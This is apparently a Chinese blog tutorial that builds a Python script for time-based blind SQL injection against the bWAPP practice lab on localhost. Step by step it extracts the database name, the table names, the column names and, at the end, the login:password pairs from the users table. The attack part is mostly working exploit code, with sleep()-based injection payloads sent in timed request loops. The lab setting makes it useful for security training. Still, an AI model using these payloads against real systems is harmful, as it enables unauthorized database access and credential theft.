-
使用python脚本的时间盲注完整步骤
一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based
import requests import time HEADER={ "Cookie":"BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0" } BASE_URL="http://127.0.0.1:9004/sqli_15.php?" def get_database_name_length(value1, value2): count = 0 for i in range(100): url=BASE_URL+"{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) #print(resp.content) if time.time()-start_time>1: print("数据库长度为:{}".format(i)) count = i break return count- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
执行语句:
databaselen = get_database_name_length(“title”, “&action=search”) + 1
执行结果
tips:title=,&action=search需要使用burp抓包获得
–两边有空格二、获取数据库名称
def get_database_name(len, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL+"{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>2: print("{}:{}".format(i,j),chr(j)) str+=(chr(j)) break print("数据库名称为:",str) return str- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
执行语句:
database = get_database_name(databaselen,“title”, “&action=search”)
执行结果
三、获取表名总长度
def get_table_name_length(database, value1, value2): count = 0 for i in range(100): url=BASE_URL+"{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- {}".format(value1, database,i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("表名总长度为:{}".format(i)) count = i break return count- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
执行语句:
tablelen = get_table_name_length(database,“title”, “&action=search”) + 1
执行结果:
四、获取表名
def get_table_name(len,database, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL+"{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>2: #print("{}:{}".format(i,j),chr(j)) str+=(chr(j)) break print("{}:".format(i),str) print("表名为:",str) return str- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
执行语句:
get_table_name(tablelen,database,“title”, “&action=search”)
执行结果:
,
五、获取指定表列名总长度
def get_column_name_length(database,table, value1, value2): count = 0 for i in range(100): url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table,database,i, value1) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("列名总长度为:{}".format(i)) count = i break return count- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
执行语句:
columnlen = get_column_name_length(database, “users”,“title”, “&action=search”) + 1
执行结果:
六、获取指定表列名
def get_column_name(len,database, table, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL+"{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{},1))={} and sleep(2) -- {}".format(value1, table, database, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER), if time.time()-start_time>2: str+=(chr(j)) break print("{}:".format(i),str) print("列名为:",str) return str- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
执行语句:
get_column_name(columnlen, database, “users”,“title”, “&action=search”)
执行结果:
七、获取指定表指定列的表内数据总长度
def get_data_name_length(table, username, password, value1, value2): count = 0 for i in range(100): url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- {}".format(value1, username, password, table,i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("列数据总长度为:{}".format(i)) count = i break return count- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
执行语句:
datalen = get_data_name_length(“users”, “login”, “password”,“title”, “&action=search”) + 1
执行结果:
八、获取指定表指定列的表内数据
def get_data_name(len, table, username, password, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL+"{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER), if time.time()-start_time>2: str+=(chr(j)) break print("{}:".format(i),str) print("登录数据为:",str) return str- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
执行语句:
get_data_name(datalen, “users”, “login”, “password”,“title”, “&action=search”)
执行结果:
我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名 -
相关阅读:
zeek学习(五)—— 会话建立
电商api接口进行数据采集获取淘宝/天猫/京东/抖音多平台商品价格
React报错之react component changing uncontrolled input
大数据-之LibrA数据库系统告警处理(ALM-12048 网络写包错误率超过阈值)
Guava中常用Object方法-equals与null比较、hashCode、自定义toString、自定义compareTo排序
[Kettle] Excel输入
python元组与列表的区别
【小程序】WXSS模板样式
汽车电子专栏目录一览
UG NX二次开发(C#)-外部模式-导出dwg格式的文件
- 原文地址:https://blog.csdn.net/wutiangui/article/details/133430564
